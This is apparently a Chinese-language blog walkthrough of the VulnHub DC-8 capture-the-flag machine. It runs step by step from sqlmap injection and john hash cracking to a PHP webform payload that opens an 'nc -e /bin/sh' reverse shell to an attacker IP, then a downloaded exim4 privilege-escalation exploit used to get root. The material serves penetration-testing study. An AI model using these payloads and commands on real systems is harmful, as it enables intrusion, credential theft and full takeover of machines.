vulnhub-DC8笔记

发布于 2022-02-16  1992 次阅读


  1. nmap -sP 192.168.0.1/24
  2. nmap -A -p 1-65535 192.168.0.104发现开放22/80
  3. 80端口进入,随便点点,首页左边疑似sql注入,?nid=1',报错
  4. sqlmap -u "http://192.168.0.104/?nid=1" --batch -D d7db -T users -C "name,pass" --dump
  5. 获取两组用户及md5,admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
    john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF保存到1.txt
    尝试john ./1.txt爆破md5值
  6. john:turtle获得一组http://192.168.0.104/user/login,成功登录
  7. 在content.find content发现可以更改Contact Us这篇文章
  8. 在findcontent.webform.formsettings下添加<?php system("nc -e /bin/sh 192.168.0.100 9999");?>
    返回主页随便填,提交触发php
  9. kali监听9999,反弹shell
  10. python -c 'import pty;pty.spawn("/bin/bash")'
  11. find / -perm -4000 -user root 2>/dev/null使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限
  12. exim4 --version发现4.89的版本
  13. searchsploit exim
  14. cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
  15. 编辑脚本:set ff=unix保存退出
  16. python -m SimpleHTTPServer
  17. 靶机当前目录没写权限cd /tmp
  18. wget http://192.168.0.100:8000/getShell.sh
    chmod 777 getShell.sh
  19. ./getShell.sh -m netcat
  20. python -c 'import pty;pty.spawn("/bin/bash")'
  21. cd /root
  22. cat flag.txt

 

Brilliant - you have succeeded!!!

 

888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888

 

Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.

参考文章vulnhub渗透实战-DC8 - Wuzhiyu - 博客园 (cnblogs.com)
(26条消息) DC8-靶机_Au-CSDN博客_dc-8靶机

收获

  • john的md5爆破
  • exim4邮件系统提权
  • searchsploit exim  查找软件漏洞库
子夜不哭
最后更新于 2022-02-16